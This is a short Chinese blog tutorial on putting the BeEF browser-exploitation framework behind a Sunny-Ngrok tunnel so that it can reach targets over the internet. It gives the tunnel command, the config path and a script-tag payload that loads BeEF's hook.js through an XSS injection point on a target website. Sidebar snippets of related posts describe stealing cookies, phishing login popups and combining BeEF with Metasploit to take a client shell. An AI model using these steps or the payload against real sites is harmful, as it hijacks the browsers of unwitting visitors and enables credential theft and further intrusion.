beef-xss+Sunny-Ngrok实现内网穿透

最新推荐文章于 2022-08-10 17:54:11 发布
最新推荐文章于 2022-08-10 17:54:11 发布
阅读量1.1k 收藏 4
点赞数

一、实验工具

1、kali linux 2019.1-vm-amd64
2、beef-xss
3、sunny-ngrok

二、步骤

1、运行sunny程序

./sunny clientid 隧道id

在这里插入图片描述
2、自定义监听端口并开启beef-xss
修改配置文件,配置文件路径:/etc/beef-xss/config.yam
在这里插入图片描述
启动beef-xss

beef-xss

3、在目标网站的注入点进行xss注入
在这里插入图片描述
注入代码:

<script type="text/javascript" src="http://127.0.0.1:11098/hook.js"></script>

执行成功,连接控制台:
在这里插入图片描述
从而开始进行深入浏览器攻击。

一只早起的小菜鸟
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
使用Beef劫持客户端浏览器并进一步使用Beef+msf拿客户端shell
MickeyMouse1928的博客
04-08 2万+
利用Beef劫持客户端浏览器   环境: 1.Kali(使用beef生成恶意代码,IP:192.168.114.140) 2.一台web服务器(留言板存在XSS跨站脚本漏洞,IP:192.168.114.204) 3. 客户端(用于访问web服务器,IP:192.168.114.130) 步骤: 1. Kali使用beef生成恶意代码 2. 将恶意代码写入192.168.114.2
BeEF+ngrok实现穿透效果的主机控制
大方子
04-27 1278
NGROK:https://bin.equinox.io BeEF:https://github.com/sdfzy/BeeF-Over-Wan 1.先去下载linux 版本的ngrok 2.zip压缩包放到/usr/local/bin目录下解压并配置 token 3.切换到/root/.ngrok2目录配置ngrok.yml文件 把BeEF需要监听的内容写入ngro...
原来frp内穿透这么搞-学习了
programmer_trip的博客
07-18 427
目前买了树莓派,安装了centos7系统,现在想让外的电脑能ssh同时也可以域名访问内的项目,这个时候就需要实现穿透,看了很多工具,尝试了一下frp的方式,成功实现穿透,特此记录 首先得有一个具有公ip的服务器,这里我之前已经买了阿里云的服务器,一年80多 因为我内服务器(树莓派服务器)和阿里云服务器装的都是centos7系统,因此整体环境为Linux系统,这里内服务器作为客户端,阿里云服务器最为服务端 下载frp压缩包 frp历史版本地址 在这里插入图片描述 ...
【渗透测试工具beef】XSS渗透测试工具beef如何安装使用?
请大家直接把问题写在评论区或留言,不要只说一句"你好 或 在吗",我会尽快回复的。
04-25 7265
目录 beef介绍 beef工作原理简介 kali下使用beef beef配置IP地址及默认密码 使用beef攻击流程 启动beef 通过web端访问 1、输入config.xml中配置的用户名和密码,登录beef管理台 2、在站中植入hook.js代码 3、客户端192.168.107.110,访问这个页面,就会被beef勾住,浏览器的大量信息就被beef获取到了 4、获取浏览器cookie 5、页重定向,目标浏览器跳转到你指定的页 6、登录弹窗,获取用户名和密码 .
ubuntu frp方式,实现穿透
ck784101777的博客
10-11 1万+
1.配置FRP (1)配置阿里云服务器 当前阿里云服务器为frp开放的端口为600~6100 为机器同时配置ssh和web端口时端口需要连续(方便记忆),且定义规则ssh端口号为偶数,web管理界面为奇数。 所有配置到工控机的frp端口必须同步记录到阿里云服务器上的/root/frp_0.27.0_linux_amd64/client.info api端口: 6070/6089 每台client端需要配置不同的proxy name[相同机器和不同机器之间.
vasp.5.4.4&beef-src.tar.xz
03-20
VASP+BEEF beef-vdW全称为Bayesian error estimation functional with van der Waals correlation, 是DTU在2012年做出来的一个新泛函,目前和Quantum Espresso,VASP,GPAW均有接口。具体的编译过程可以参考SUNCAT...
raylib-beef:用于Beef编程语言的raylib绑定
05-06
雷利比牛肉raylib-beef是Raylib 3.1 dev的Beef包装器库,这是一个简单易用的库。 结合Beef编程语言的优势,制作游戏绝对令人满足! 注意力! 这种绑定仍在开发中。 可能会发生错误。 二进制文件已从存储库中删除。 ...
beef-installer:用于发行版和Termux的BeEF安装程序!
04-17
牛肉安装机 该脚本可自动从GitHub安装BeEF(浏览器利用框架)。要使用它以root身份运行: (为了): git clone https://github.com/tony23x/beef-install.git cd beef-installer;ls bash install.sh python3 beef...
squid3-beEF:概念证明 - 使用 squid url 重写功能“劫持”代理流量并将 BeEF 负载注入其中
06-23
Squid3-beEF 概念证明 - 使用 url 重写功能“劫持”代理流量并将负载注入其中。 要求 PHP 5.3 阿帕奇 mod_php 安装 将 rewrite.php 和 payload.js 复制到 apache 文档根目录 使用以下命令使 rewrite.php 可执行...
kali-beef攻击浏览器-运维安全详细笔记总结
06-30
kali-beef攻击浏览器-运维安全详细笔记总结
Metasploit+beef攻击实验
10-12
BeEF,全称The Browser Exploitation Framework,是一款针对浏览器的渗透测试工具。
metasploit利用IE漏洞XSS挂马拿内主机
代码析构师的专栏
08-07 953
metasploit内渗透方面好多方式,这只是科普下xss在内中的利用。 系统:KALI 用到的工具:beEF+msf  利用的IE漏洞是:http://www.rapid7.com/db/modules/exploit/windows/browser/ie_execcommand_uaf MS12-063  Automatic IE 7 on Windows
【安全系列】beef-xss攻击示例
叁滴水 的博客
08-09 4997
beef-xss说明 BeEF是“浏览器开发框架”的缩写。它是一个专注于Web浏览器的渗透测试工具。 ​BeEF使专业的渗透测试人员可以使用客户端攻击向量来评估目标环境的实际安全状况。与其他安全框架不同,BeEF超越了硬化的络边界和客户端系统,并在一个门户开放的环境中检查可利用性:Web浏览器。BeEF将钩挂一个或多个Web浏览器,并将其用作启动定向命令模块的滩头堡,并从浏览器上下文中对系统进行进一步攻击。 1.安装beef-xss apt-get install beef-xss Setting
Metasploit+Beef整合攻击——超详细
一个懒鬼的博客
05-10 1985
文章目录 前言 一、准备工作 1.配置beef 2.配置Metasploit 二、实际操作 三、Beef隧道代理 总结 前言 BeeF是前欧美最流行的web框架攻击平台,kali 集成Beef,而且Beef有很多好使的payload。例如,通过XSS这个简单的漏洞,BeeF可以通过一段编制好的javascript控制目标主机的浏览器,通过浏览器拿到各种信息并且扫描内信息,同时能够配合metasploit进一步渗透主机,beef属于c/s结构,具体看图 zombie(僵尸)即受害的浏览器。
xss利用之kali神器beef
jiangliuzheng的专栏
07-14 3万+
1、beef基本配置 BeEF在Kali下默认安装,直接找到对应图标启动即可,但是默认设置未同Metasploit关联,无法使用msf模块,因此需要作如下配置连接msf 1、修改config.yaml 编辑 /usr/share/beef-xss/config.yaml metasploit: enable: false改为true 编辑 /usr/
ngrok实现穿透
热门推荐
ianly@梁炎的博客
02-09 22万+
: https://ngrok.com/ 步骤也很简单: 比如我想映射本地8888端口到外,那么我输入 ./ngrok http 8888 就会出现以下结果:
跨站脚本攻击xss利用-beef攻击-演示
jklbnm12的博客
02-09 1015
0x0环境 主机A win10:10.51.20.60(wifi) 主机A中的虚拟机kali(攻击者):192.168.110.129(NAT) 主机A中的虚拟机win2003(受害者):192.168.110.132(NAT) 0x1 配置 0x11 beef配置 Beef的配置文件在 /usr/share/beef-xss/config.yaml Host:kali IP Port:beef监听端口默认3000 public:主机A(接入外的电脑IP) public_port:主机A中空闲的端口,我
Kali安装beef-xss
qq_58000413的博客
08-10 2232
不更新可能会出现下面的情况:metasploit-framework : 依赖: ruby (< 1:2.8) 但是 1:3.0+1kali1 正要被安装。#把192.168.199.129替换成本机IP。
渗透一:利用Xss漏洞进入内
WHACKW的专栏
11-17 5153
0x01:科普 Beef目前欧美最流行的WEB框架攻击平台,全称:The Browser Exploitation Framework Project. Beef利用简单的XSS漏洞,通过一段编写好的JavaScript(hook.js)控制目标主机的浏览器,通过目标主机浏览器获得该主机的详细信息,并进一步扫描内,配合metasploit绝对是内渗透一大杀器。  0x02安装
云服务器上搭建beef-xss
最新发布
03-11
在云服务器上搭建beef-xss(Browser Exploitation Framework)可以用于进行Web浏览器漏洞利用和XSS攻击的测试和研究。下面是一些步骤来搭建beef-xss: 1. 选择云服务器:首先,你需要选择一个云服务器提供商,如...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值